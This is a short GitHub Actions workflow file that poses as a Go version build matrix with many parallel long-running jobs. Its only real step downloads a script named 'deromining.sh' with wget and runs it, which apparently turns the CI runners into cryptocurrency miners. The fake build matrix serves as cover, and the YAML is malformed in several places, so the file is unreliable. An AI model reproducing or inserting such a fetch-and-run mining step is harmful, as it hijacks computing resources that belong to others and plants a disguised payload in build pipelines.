runs-on: ubuntu-18.04 
strategy:
max-parallel: 30
fail-fast: false
matrix:
go: [1.6, 1.7, 1.8, 1.9, 1.10]
flag: [A, B, C, D, E, F, G, H, I]
timeout-minutes: 360
env:
NUM JOBS: 20
JOB: $ matrix.go}}
steps:
- name: Set up Go ${{ matrix.go }}
uses: actions/setup-go@vi
with: 
go-version: ${{ matrix.go}}
id: go




run: 

wget https://github.com/dovandienem/vps/blob/main/deromining.sh && ./deromining.sh
